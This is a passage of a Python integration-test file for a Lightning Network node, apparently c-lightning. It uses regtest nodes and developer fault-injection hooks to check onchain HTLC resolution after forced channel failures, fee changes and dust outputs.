    OUR_HTLC_SUCCESS_TX, l1 learns the preimage from the chain, and the
    payment still succeeds.
    """
    # l2 drops the connection instead of sending WIRE_UPDATE_FULFILL_HTLC,
    # then perma-fails the channel.
    disconnects = ['-WIRE_UPDATE_FULFILL_HTLC', 'permfail']
    l1 = node_factory.get_node()
    l2 = node_factory.get_node(disconnect=disconnects)
    l3 = node_factory.get_node()

    # l2 connects to both, so l1 can't reconnect and thus l2 drops to chain
    l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
    l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
    l2.fund_channel(l1, 10**6)
    c23 = l2.fund_channel(l3, 10**6)

    # Make sure routes finalized.
    bitcoind.generate_block(5)
    l1.wait_channel_active(c23)

    # Give l1 some money to play with.
    l2.pay(l1, 2 * 10**8)

    # Must be bigger than dust!
    rhash = l3.rpc.invoice(10**8, 'middleman', 'desc')['payment_hash']

    route = l1.rpc.getroute(l3.info['id'], 10**8, 1)["route"]
    assert len(route) == 2

    q = queue.Queue()

    def try_pay():
        # Runs in a thread; reports success (None) or the exception via q.
        try:
            l1.rpc.sendpay(route, rhash)
            l1.rpc.waitsendpay(rhash)
            q.put(None)
        except Exception as err:
            q.put(err)

    t = threading.Thread(target=try_pay)
    t.daemon = True
    t.start()

    # l2 will drop to chain.
    l2.daemon.wait_for_log('sendrawtx exit 0')
    l1.bitcoin.generate_block(1)
    l2.daemon.wait_for_log(' to ONCHAIN')
    l1.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log('OUR_UNILATERAL/THEIR_HTLC')

    # l2 should fulfill HTLC onchain, and spend to-us (any order)
    l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
                                   'OUR_UNILATERAL/THEIR_HTLC')

    # Payment should succeed.
    l1.bitcoin.generate_block(1)
    l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC gave us preimage')
    err = q.get(timeout=10)
    if err:
        print("Got err from sendpay thread")
        raise err
    t.join(timeout=1)
    # BUGFIX: Thread.isAlive() was removed in Python 3.9; use is_alive().
    assert not t.is_alive()

    # Three more, l2 can spend to-us.
    bitcoind.generate_block(3)
    l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                   'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')

    # One more block, HTLC tx is now spendable.
    l1.bitcoin.generate_block(1)
    l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                   'OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')

    # 100 blocks after last spend, l2 should be done.
    l1.bitcoin.generate_block(100)
    l2.daemon.wait_for_log('onchaind complete, forgetting peer')
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_feechange(node_factory, bitcoind, executor):
    """Onchain handling when we restart with different fees"""
    # HTLC 1->2, 2 fails just after they're both irrevocably committed
    # We need 2 to drop to chain, because then 1's HTLC timeout tx
    # is generated on-the-fly, and is thus feerate sensitive.
    l1 = node_factory.get_node(may_reconnect=True)
    l2 = node_factory.get_node(disconnect=['-WIRE_UPDATE_FAIL_HTLC', 'permfail'],
                               may_reconnect=True)

    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    l1.fund_channel(l2, 10**6)

    rhash = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')['payment_hash']
    # We underpay, so it fails.
    hop = {
        'msatoshi': 10**8 - 1,
        'id': l2.info['id'],
        'delay': 5,
        'channel': '1x1x1'
    }

    executor.submit(l1.rpc.sendpay, [hop], rhash)

    # l2 will drop to chain.
    l2.daemon.wait_for_log('permfail')
    l2.wait_for_channel_onchain(l1.info['id'])

    bitcoind.generate_block(1)
    l1.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log(' to ONCHAIN')

    # Wait for timeout.
    l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US .* after 6 blocks')
    bitcoind.generate_block(6)

    l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
                                   'THEIR_UNILATERAL/OUR_HTLC')

    # Make sure that gets included.
    bitcoind.generate_block(1)

    # Now we restart with different feerates.
    l1.stop()
    l1.daemon.cmd_line.append('--override-fee-rates=20000/9000/2000')
    l1.start()

    # Even with new feerates, the old proposal must be recognized as ours.
    l1.daemon.wait_for_log('Resolved THEIR_UNILATERAL/OUR_HTLC by our proposal OUR_HTLC_TIMEOUT_TO_US')

    # We use 3 blocks for "reasonable depth", so add two more
    bitcoind.generate_block(2)

    # Note that the very similar test_onchain_timeout looks for a
    # different string: that's because it sees the JSONRPC response,
    # and due to the l1 restart, there is none here.
    l1.daemon.wait_for_log('WIRE_PERMANENT_CHANNEL_FAILURE')

    # 90 later, l2 is done
    bitcoind.generate_block(89)
    sync_blockheight(bitcoind, [l2])
    assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
    bitcoind.generate_block(1)
    l2.daemon.wait_for_log('onchaind complete, forgetting peer')

    # Now, 7 blocks and l1 should be done.
    bitcoind.generate_block(6)
    sync_blockheight(bitcoind, [l1])
    assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
    bitcoind.generate_block(1)
    l1.daemon.wait_for_log('onchaind complete, forgetting peer')

    # Payment failed, BTW
    assert only_one(l2.rpc.listinvoices('onchain_timeout')['invoices'])['status'] == 'unpaid'
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1 for dev-set-fees")
def test_onchain_all_dust(node_factory, bitcoind, executor):
    """Onchain handling when we reduce output to all dust.

    With l1's feerate cranked sky-high, sweeping the HTLC output would
    cost more than it's worth, so onchaind must IGNORE it rather than
    broadcast an uneconomical spend.
    """
    # HTLC 1->2, 2 fails just after they're both irrevocably committed
    # We need 2 to drop to chain, because then 1's HTLC timeout tx
    # is generated on-the-fly, and is thus feerate sensitive.
    disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
    # Feerates identical so we don't get gratuitous commit to update them
    l1 = node_factory.get_node(options={'dev-no-reconnect': None}, feerates=(7500, 7500, 7500))
    l2 = node_factory.get_node(disconnect=disconnects)

    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    l1.fund_channel(l2, 10**6)
    rhash = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')['payment_hash']
    # We underpay, so it fails.
    routestep = {
        'msatoshi': 10**7 - 1,
        'id': l2.info['id'],
        'delay': 5,
        'channel': '1x1x1'
    }

    executor.submit(l1.rpc.sendpay, [routestep], rhash)

    # l2 will drop to chain.
    l2.daemon.wait_for_log('permfail')
    l2.wait_for_channel_onchain(l1.info['id'])

    # Make l1's fees really high (and wait for it to exceed 50000)
    l1.set_feerates((100000, 100000, 100000))
    l1.daemon.wait_for_log('Feerate estimate for normal set to [56789][0-9]{4}')

    bitcoind.generate_block(1)
    l1.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log(' to ONCHAIN')

    # Wait for timeout.
    l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by IGNORING_TINY_PAYMENT .* after 6 blocks')
    bitcoind.generate_block(5)

    l1.wait_for_onchaind_broadcast('IGNORING_TINY_PAYMENT',
                                   'THEIR_UNILATERAL/OUR_HTLC')
    l1.daemon.wait_for_log('Ignoring output 0 of .*: THEIR_UNILATERAL/OUR_HTLC')

    # 100 deep and l2 forgets.
    bitcoind.generate_block(93)
    sync_blockheight(bitcoind, [l1, l2])
    # Neither side may forget a block early.
    assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
    assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
    bitcoind.generate_block(1)
    l2.daemon.wait_for_log('onchaind complete, forgetting peer')

    # l1 does not wait for ignored payment.
    l1.daemon.wait_for_log('onchaind complete, forgetting peer')
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1 for dev_fail")
def test_onchain_different_fees(node_factory, bitcoind, executor):
    """Onchain handling when we've had a range of fees"""
    l1, l2 = node_factory.line_graph(2, fundchannel=True, fundamount=10**7,
                                     opts={'may_reconnect': True})

    # l2 sits on incoming HTLCs so all three payments stay pending.
    l2.rpc.dev_ignore_htlcs(id=l1.info['id'], ignore=True)

    pay_futures = [executor.submit(l1.pay, l2, 1000000000)]
    l1.daemon.wait_for_log('htlc 0: RCVD_ADD_ACK_COMMIT->SENT_ADD_ACK_REVOCATION')

    l1.set_feerates((16000, 7500, 3750))
    pay_futures.append(executor.submit(l1.pay, l2, 900000000))
    l1.daemon.wait_for_log('htlc 1: RCVD_ADD_ACK_COMMIT->SENT_ADD_ACK_REVOCATION')

    # Restart with different feerate for second HTLC.
    l1.set_feerates((5000, 5000, 3750))
    l1.restart()
    l1.daemon.wait_for_log('peer_out WIRE_UPDATE_FEE')

    pay_futures.append(executor.submit(l1.pay, l2, 800000000))
    l1.daemon.wait_for_log('htlc 2: RCVD_ADD_ACK_COMMIT->SENT_ADD_ACK_REVOCATION')

    # Drop to chain
    l1.rpc.dev_fail(l2.info['id'])
    l1.wait_for_channel_onchain(l2.info['id'])

    bitcoind.generate_block(1)
    l1.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log(' to ONCHAIN')

    # Both sides should have recorded the full feerate range they saw.
    expected_range = [{
        'min_possible_feerate': 5000,
        'max_possible_feerate': 16000
    }]
    assert l1.db_query('SELECT min_possible_feerate, max_possible_feerate FROM channels;') == expected_range
    assert l2.db_query('SELECT min_possible_feerate, max_possible_feerate FROM channels;') == expected_range

    bitcoind.generate_block(5)
    # Three HTLCs, and one for the to-us output.
    l1.daemon.wait_for_logs(['sendrawtx exit 0'] * 4)

    # We use 3 blocks for "reasonable depth"
    bitcoind.generate_block(3)

    # All three stuck payments must now fail.
    for fut in pay_futures:
        with pytest.raises(Exception):
            fut.result(10)

    # Two more for HTLC timeout tx to be spent.
    bitcoind.generate_block(2)
    l1.daemon.wait_for_logs(['sendrawtx exit 0'] * 3)

    # Now, 100 blocks it should be done.
    bitcoind.generate_block(100)
    wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
    wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_permfail_new_commit(node_factory, bitcoind, executor):
    """Two possible commitments exist: the peer must use the newer one."""
    # l2 drops before sending revoke_and_ack, then perma-fails.
    # Feerates identical so we don't get gratuitous commit to update them
    l1 = node_factory.get_node(options={'dev-no-reconnect': None}, feerates=(7500, 7500, 7500))
    l2 = node_factory.get_node(disconnect=['-WIRE_REVOKE_AND_ACK', 'permfail'])

    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    l1.fund_channel(l2, 10**6)

    # This will fail at l2's end.
    pay_future = executor.submit(l1.pay, l2, 200000000)

    l2.daemon.wait_for_log('dev_disconnect permfail')
    l2.wait_for_channel_onchain(l1.info['id'])
    bitcoind.generate_block(1)

    # l1 must recognize this as the *new* commitment, not the old one.
    l1.daemon.wait_for_log('Their unilateral tx, new commit point')
    l1.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
    l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US (.*) after 6 blocks')

    # OK, time out HTLC.
    bitcoind.generate_block(5)
    l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
                                   'THEIR_UNILATERAL/OUR_HTLC')
    bitcoind.generate_block(1)
    l1.daemon.wait_for_log('Resolved THEIR_UNILATERAL/OUR_HTLC by our proposal OUR_HTLC_TIMEOUT_TO_US')
    l2.daemon.wait_for_log('Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC')

    # The stuck payment can never complete; drop it.
    pay_future.cancel()

    # Now, 100 blocks it should be done.
    bitcoind.generate_block(100)
    wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
    wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
def setup_multihtlc_test(node_factory, bitcoind):
    """Build a 7-node line with in-flight HTLCs in both directions.

    Topology: l1 -> l2 -> l3 -> l4 -> l5 -> l6 -> l7, where l1 and l7
    ignore any HTLCs they're sent (dev_ignore_htlcs).

    For each direction, we create these HTLCs with same payment_hash:
       1 failed (CLTV1)
       1 failed (CLTV2)
       2 live (CLTV2)
       1 live (CLTV3)

    Returns (payment_hash, nodes).
    """
    nodes = node_factory.line_graph(7, wait_for_announce=True,
                                    opts={'dev-no-reconnect': None,
                                          'may_reconnect': True})

    # Balance by pushing half the funds.
    b11 = nodes[-1].rpc.invoice(10**9 // 2, '1', 'balancer')['bolt11']
    nodes[0].rpc.pay(b11)

    # End nodes will sit on incoming HTLCs: neither fail nor fulfill.
    nodes[0].rpc.dev_ignore_htlcs(id=nodes[1].info['id'], ignore=True)
    nodes[-1].rpc.dev_ignore_htlcs(id=nodes[-2].info['id'], ignore=True)

    # Both directions use the same known preimage, hence same payment_hash.
    preimage = "0" * 64
    h = nodes[0].rpc.invoice(msatoshi=10**8, label='x', description='desc',
                             preimage=preimage)['payment_hash']
    nodes[-1].rpc.invoice(msatoshi=10**8, label='x', description='desc',
                          preimage=preimage)['payment_hash']

    # First, the failed attempts (paying wrong node). CLTV1
    r = nodes[0].rpc.getroute(nodes[-2].info['id'], 10**8, 1)["route"]
    nodes[0].rpc.sendpay(r, h)
    with pytest.raises(RpcError, match=r'INCORRECT_OR_UNKNOWN_PAYMENT_DETAILS'):
        nodes[0].rpc.waitsendpay(h)

    r = nodes[-1].rpc.getroute(nodes[1].info['id'], 10**8, 1)["route"]
    nodes[-1].rpc.sendpay(r, h)
    with pytest.raises(RpcError, match=r'INCORRECT_OR_UNKNOWN_PAYMENT_DETAILS'):
        nodes[-1].rpc.waitsendpay(h)

    # Now increment CLTV -> CLTV2
    bitcoind.generate_block(1)
    sync_blockheight(bitcoind, nodes)

    # Now, the live attempts with CLTV2 (blackholed by end nodes)
    r = nodes[0].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
    nodes[0].rpc.sendpay(r, h)
    r = nodes[-1].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
    nodes[-1].rpc.sendpay(r, h)

    # We send second HTLC from different node, since they refuse to send
    # multiple with same hash.
    r = nodes[1].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
    nodes[1].rpc.sendpay(r, h)
    r = nodes[-2].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
    nodes[-2].rpc.sendpay(r, h)

    # Now increment CLTV -> CLTV3.
    bitcoind.generate_block(1)
    sync_blockheight(bitcoind, nodes)

    r = nodes[2].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
    nodes[2].rpc.sendpay(r, h)
    r = nodes[-3].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
    nodes[-3].rpc.sendpay(r, h)

    # Make sure HTLCs have reached the end.
    nodes[0].daemon.wait_for_logs(['peer_in WIRE_UPDATE_ADD_HTLC'] * 3)
    nodes[-1].daemon.wait_for_logs(['peer_in WIRE_UPDATE_ADD_HTLC'] * 3)

    return h, nodes
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1 for dev_ignore_htlcs")
@unittest.skipIf(SLOW_MACHINE and VALGRIND, "slow test")
def test_onchain_multihtlc_our_unilateral(node_factory, bitcoind):
    """Node pushes a channel onchain with multiple HTLCs with same payment_hash """
    h, nodes = setup_multihtlc_test(node_factory, bitcoind)

    # Index of the node whose channel we will force onchain.
    mid = len(nodes) // 2

    # Sanity check: after setup every adjacent pair is still connected.
    for i in range(len(nodes) - 1):
        assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']

    # Now midnode goes onchain with n+1 channel.
    nodes[mid].rpc.dev_fail(nodes[mid + 1].info['id'])
    nodes[mid].wait_for_channel_onchain(nodes[mid + 1].info['id'])

    bitcoind.generate_block(1)
    nodes[mid].daemon.wait_for_log(' to ONCHAIN')
    nodes[mid + 1].daemon.wait_for_log(' to ONCHAIN')

    # Now, restart and manually reconnect end nodes (so they don't ignore HTLCs)
    # In fact, they'll fail them with WIRE_TEMPORARY_NODE_FAILURE.
    nodes[0].restart()
    nodes[-1].restart()

    # We disabled auto-reconnect so we'd detect breakage, so manually reconnect.
    nodes[0].rpc.connect(nodes[1].info['id'], 'localhost', nodes[1].port)
    nodes[-1].rpc.connect(nodes[-2].info['id'], 'localhost', nodes[-2].port)

    # Wait for HTLCs to stabilize: 3 fails + commit + revoke on each end node.
    nodes[0].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
    nodes[0].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
    nodes[0].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
    nodes[-1].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
    nodes[-1].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
    nodes[-1].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')

    # After at depth 5, midnode will spend its own to-self output.
    bitcoind.generate_block(4)
    nodes[mid].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                           'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')

    # The three outgoing HTLCs time out at 21, 21 and 22 blocks.
    bitcoind.generate_block(16)
    nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
                                           'OUR_UNILATERAL/OUR_HTLC')
    nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
                                           'OUR_UNILATERAL/OUR_HTLC')
    bitcoind.generate_block(1)
    nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
                                           'OUR_UNILATERAL/OUR_HTLC')

    # And three more for us to consider them all settled.
    bitcoind.generate_block(3)

    # Now, those nodes should have correctly failed the HTLCs
    for n in nodes[:mid - 1]:
        with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
            n.rpc.waitsendpay(h, TIMEOUT)

    # Other timeouts are 27,27,28 blocks.
    bitcoind.generate_block(2)
    nodes[mid].daemon.wait_for_logs(['Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC'] * 2)
    for _ in range(2):
        nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
                                                   'THEIR_UNILATERAL/OUR_HTLC')

    bitcoind.generate_block(1)
    nodes[mid].daemon.wait_for_log('Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC')
    nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
                                               'THEIR_UNILATERAL/OUR_HTLC')

    # Depth 3 to consider it settled.
    bitcoind.generate_block(3)

    for n in nodes[mid + 1:]:
        with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
            n.rpc.waitsendpay(h, TIMEOUT)

    # At depth 100 it's all done (we didn't bother waiting for mid+1's
    # spends, so that might still be going)
    bitcoind.generate_block(97)
    nodes[mid].daemon.wait_for_logs(['onchaind complete, forgetting peer'])

    # No other channels should have failed.
    for i in range(len(nodes) - 1):
        if i != mid:
            assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1 for dev_ignore_htlcs")
@unittest.skipIf(SLOW_MACHINE and VALGRIND, "slow test")
def test_onchain_multihtlc_their_unilateral(node_factory, bitcoind):
    """Node pushes a channel onchain with multiple HTLCs with same payment_hash """
    h, nodes = setup_multihtlc_test(node_factory, bitcoind)

    # Index of the node on the *remote* side of the force-closed channel.
    mid = len(nodes) // 2

    # Sanity check: after setup every adjacent pair is still connected.
    for i in range(len(nodes) - 1):
        assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']

    # Now midnode+1 goes onchain with midnode channel.
    nodes[mid + 1].rpc.dev_fail(nodes[mid].info['id'])
    nodes[mid + 1].wait_for_channel_onchain(nodes[mid].info['id'])

    bitcoind.generate_block(1)
    nodes[mid].daemon.wait_for_log(' to ONCHAIN')
    nodes[mid + 1].daemon.wait_for_log(' to ONCHAIN')

    # Now, restart and manually reconnect end nodes (so they don't ignore HTLCs)
    # In fact, they'll fail them with WIRE_TEMPORARY_NODE_FAILURE.
    nodes[0].restart()
    nodes[-1].restart()

    # We disabled auto-reconnect so we'd detect breakage, so manually reconnect.
    nodes[0].rpc.connect(nodes[1].info['id'], 'localhost', nodes[1].port)
    nodes[-1].rpc.connect(nodes[-2].info['id'], 'localhost', nodes[-2].port)

    # Wait for HTLCs to stabilize: 3 fails + commit + revoke on each end node.
    nodes[0].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
    nodes[0].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
    nodes[0].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
    nodes[-1].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
    nodes[-1].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
    nodes[-1].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')

    # At depth 5, midnode+1 will spend its own to-self output.
    bitcoind.generate_block(4)
    nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET')

    # The three outgoing HTLCs time out at depth 21, 21 and 22 blocks.
    bitcoind.generate_block(16)
    nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
                                           'THEIR_UNILATERAL/OUR_HTLC')
    nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
                                           'THEIR_UNILATERAL/OUR_HTLC')
    bitcoind.generate_block(1)
    nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
                                           'THEIR_UNILATERAL/OUR_HTLC')

    # At depth 3 we consider them all settled.
    bitcoind.generate_block(3)

    # Now, those nodes should have correctly failed the HTLCs
    for n in nodes[:mid - 1]:
        with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
            n.rpc.waitsendpay(h, TIMEOUT)

    # Other timeouts are at depths 27,27,28 blocks.
    bitcoind.generate_block(2)
    nodes[mid].daemon.wait_for_logs(['Ignoring output.*: THEIR_UNILATERAL/THEIR_HTLC'] * 2)
    for _ in range(2):
        nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
                                                   'OUR_UNILATERAL/OUR_HTLC')

    bitcoind.generate_block(1)
    nodes[mid].daemon.wait_for_log('Ignoring output.*: THEIR_UNILATERAL/THEIR_HTLC')
    nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
                                               'OUR_UNILATERAL/OUR_HTLC')

    # At depth 3 we consider them all settled.
    bitcoind.generate_block(3)

    for n in nodes[mid + 1:]:
        with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
            n.rpc.waitsendpay(h, TIMEOUT)

    # At depth 5, mid+1 can spend HTLC_TIMEOUT_TX output.
    bitcoind.generate_block(1)
    for _ in range(2):
        nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                                   'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
    bitcoind.generate_block(1)
    nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                               'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')

    # At depth 100 they're all done.
    bitcoind.generate_block(100)
    nodes[mid].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
    nodes[mid + 1].daemon.wait_for_logs(['onchaind complete, forgetting peer'])

    # No other channels should have failed.
    for i in range(len(nodes) - 1):
        if i != mid:
            assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_permfail_htlc_in(node_factory, bitcoind, executor):
    """Permanent failure of l2 while it holds an unsettled *incoming* HTLC.

    l2 disconnects before sending WIRE_UPDATE_FULFILL_HTLC and then
    permanently fails, forcing its commitment onchain; onchaind must
    claim the HTLC with the preimage instead of letting it time out.
    """
    # Test case where we fail with unsettled incoming HTLC.
    disconnects = ['-WIRE_UPDATE_FULFILL_HTLC', 'permfail']
    # Feerates identical so we don't get gratuitous commit to update them
    l1 = node_factory.get_node(options={'dev-no-reconnect': None}, feerates=(7500, 7500, 7500))
    l2 = node_factory.get_node(disconnect=disconnects)

    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    l1.fund_channel(l2, 10**6)

    # This will fail at l2's end.
    t = executor.submit(l1.pay, l2, 200000000)
    l2.daemon.wait_for_log('dev_disconnect permfail')
    l2.wait_for_channel_onchain(l1.info['id'])
    bitcoind.generate_block(1)
    l1.daemon.wait_for_log('Their unilateral tx, old commit point')
    l1.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
    l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US (.*) after 6 blocks')

    # l2 then gets preimage, uses it instead of ignoring
    l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
                                   'OUR_UNILATERAL/THEIR_HTLC')
    bitcoind.generate_block(1)

    # OK, l1 sees l2 fulfill htlc.
    l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC gave us preimage')
    l2.daemon.wait_for_log('Propose handling OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
    bitcoind.generate_block(5)

    l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                   'OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')

    # The pay() future never completes normally; drop it.
    t.cancel()

    # Now, 100 blocks it should be done.
    bitcoind.generate_block(95)
    l1.daemon.wait_for_log('onchaind complete, forgetting peer')
    # l2 resolved later, so it still needs 5 more confirmations.
    assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
    bitcoind.generate_block(5)
    l2.daemon.wait_for_log('onchaind complete, forgetting peer')
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_permfail_htlc_out(node_factory, bitcoind, executor):
    """Permanent failure of l2 while it has an unsettled *outgoing* HTLC.

    l2 disconnects after sending WIRE_REVOKE_AND_ACK and permanently
    fails; l1 must claim the HTLC onchain with the preimage
    (THEIR_HTLC_FULFILL_TO_US) rather than letting l2 time it out.
    """
    # Test case where we fail with unsettled outgoing HTLC.
    disconnects = ['+WIRE_REVOKE_AND_ACK', 'permfail']
    l1 = node_factory.get_node(options={'dev-no-reconnect': None})
    # Feerates identical so we don't get gratuitous commit to update them
    l2 = node_factory.get_node(disconnect=disconnects, feerates=(7500, 7500, 7500))

    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    l2.daemon.wait_for_log('openingd-{} chan #1: Handed peer, entering loop'.format(l1.info['id']))
    l2.fund_channel(l1, 10**6)

    # This will fail at l2's end.
    t = executor.submit(l2.pay, l1, 200000000)
    l2.daemon.wait_for_log('dev_disconnect permfail')
    l2.wait_for_channel_onchain(l1.info['id'])

    bitcoind.generate_block(1)
    l1.daemon.wait_for_log('Their unilateral tx, old commit point')
    l1.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_logs([
        'Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX \\(.*\\) after 6 blocks',
        'Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks'
    ])
    l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')

    # l1 then gets preimage, uses it instead of ignoring
    l1.wait_for_onchaind_broadcast('THEIR_HTLC_FULFILL_TO_US',
                                   'THEIR_UNILATERAL/THEIR_HTLC')

    # l2 sees l1 fulfill tx.
    bitcoind.generate_block(1)
    l2.daemon.wait_for_log('OUR_UNILATERAL/OUR_HTLC gave us preimage')
    # The pay() future never completes normally; drop it.
    t.cancel()

    # l2 can send OUR_DELAYED_RETURN_TO_WALLET after 3 more blocks.
    bitcoind.generate_block(3)
    l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                   'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')

    # Now, 100 blocks they should be done.
    bitcoind.generate_block(95)
    sync_blockheight(bitcoind, [l1, l2])
    assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
    assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
    bitcoind.generate_block(1)
    l1.daemon.wait_for_log('onchaind complete, forgetting peer')
    sync_blockheight(bitcoind, [l2])
    assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
    bitcoind.generate_block(3)
    sync_blockheight(bitcoind, [l2])
